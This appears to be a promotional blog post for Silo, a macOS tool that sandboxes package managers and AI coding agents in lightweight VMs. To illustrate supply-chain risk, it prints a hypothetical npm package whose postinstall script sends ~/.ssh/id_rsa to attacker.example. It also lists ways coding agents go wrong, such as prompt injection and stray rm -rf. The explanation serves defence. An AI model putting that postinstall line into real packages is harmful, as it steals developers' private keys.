The case for sandboxing your dev tools

Package managers execute arbitrary code. AI coding agents execute arbitrary commands. Both get full user permissions by default. Here's why that has to change.

Two classes of tools routinely execute untrusted code with full user permissions on your laptop. One is old, one is new, and both are being actively exploited.

Class one: package managers

Every time you run npm install, pip install, or cargo install, you’re authorising arbitrary code execution on your machine. Packages can run postinstall scripts, setup.py blocks, and build steps — all with the same permissions as you. They can read ~/.ssh/id_rsa, send ~/.aws/credentials to a remote server, enumerate your other repos, and install a launch agent that survives reboot.
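
To make the attack surface concrete, here is a hypothetical malicious package (the name, payload, and `attacker.example` endpoint are invented for illustration): the entire “exploit” is a lifecycle script, which npm runs with your full user permissions during install.

```shell
# Build a minimal package whose postinstall exfiltrates an SSH key.
pkg=$(mktemp -d)
cat > "$pkg/package.json" <<'EOF'
{
  "name": "evil-pkg",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "cat ~/.ssh/id_rsa | curl -s -T - https://attacker.example/"
  }
}
EOF
# Anyone who installs a package that depends on evil-pkg — even ten levels
# deep in the dependency tree — runs that script as themselves.
```

Nothing here requires a vulnerability. The lifecycle-script mechanism is working exactly as designed; the design just assumes every package in the tree is trustworthy.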

Recent supply-chain attacks — compromised maintainer accounts shipping malicious updates, typosquatted package names, install-time payloads that harvest credentials — show this isn’t theoretical.

The typical response is “audit your dependencies.” That doesn’t scale. A modern Node project has thousands of transitive dependencies; a single compromised maintainer anywhere in that tree is enough.

Class two: AI coding agents

Claude Code, Cursor, Copilot Agents, and their peers read your codebase, edit files, and run shell commands on your behalf. When they work correctly they’re extraordinary productivity tools. When something goes wrong — a prompt injection buried in a README, a hallucinated rm -rf, a confused agent that decides to “clean up” a directory — the blast radius is everything you can touch: SSH keys, cloud credentials, keychain entries, other projects, unrestricted outbound network.

The usual mitigations are permission prompts (“allow this command?”) and YOLO-mode regret. Neither is structural. An attacker who can craft input reaching the agent can eventually craft input the agent will follow, and the user who clicks through prompts all day will click through the bad one too.

What a real boundary looks like

The answer isn’t more prompts or better linters. It’s running these tools somewhere they can’t see anything they don’t need.

Silo does this by running each tool inside a lightweight Apple Container VM — a real Linux kernel, not a process namespace. The VM sees the current project directory and explicitly-passed environment variables. That’s it.

| | Without Silo | With Silo |
|---|---|---|
| ~/.ssh, ~/.aws, ~/.gnupg | Full access | Do not exist |
| All environment variables | Visible | Only explicitly passed |
| Persistent RAT in user space | Possible | Dies with ephemeral VM |
| Lateral movement to other projects | Possible | Only current project mounted |
| macOS keychain, browser data | Accessible | Blocked (separate kernel) |
| Unrestricted outbound network | Yes | Proxy allowlist per tool |
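
The environment-variable row is easy to demonstrate without any VM at all. This sketch uses plain `env(1)` — it is not Silo’s CLI, just the same “only explicitly passed variables” shape of boundary:

```shell
# Start from an empty environment and pass through only what the tool needs.
NPM_TOKEN=example-token            # the one secret this tool actually requires
env -i PATH="$PATH" NPM_TOKEN="$NPM_TOKEN" sh -c 'env | sort'
# Only PATH, NPM_TOKEN, and the shell's own bookkeeping variables appear;
# AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, and the rest simply don't exist there.
```

A VM gives you the same property for the filesystem and the kernel, not just the environment — but the principle is identical: the tool can’t leak what it was never shown.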

This is the same kind of boundary you’d get running your agent in a cloud sandbox, but with none of the latency, none of the git-mirroring pain, and none of the billing surprises. It starts in ~600ms on your own hardware.

What stops working

Almost nothing, in practice. You still run python script.py. You still run npm install. You still run claude in the project root. The difference is that the postinstall that just tried to cat ~/.ssh/id_rsa got back “no such file” — because there’s nothing there to steal.
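
You can simulate what that failed theft looks like from the malicious script’s side with an empty stand-in home directory (Silo achieves this with a separate VM, not an environment variable — this is only an illustration):

```shell
sandbox_home=$(mktemp -d)          # stands in for the VM's empty home dir
cat "$sandbox_home/.ssh/id_rsa"
# → cat: .../.ssh/id_rsa: No such file or directory (non-zero exit)
```

The script doesn’t error out because it was detected; it errors out because the file it wants was never mounted into its world.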

If you’re writing software on macOS and your dev loop involves running third-party code or an AI agent, the question isn’t whether you need a sandbox. It’s which one, and whether the overhead is low enough that you’ll actually use it.

Install Silo →
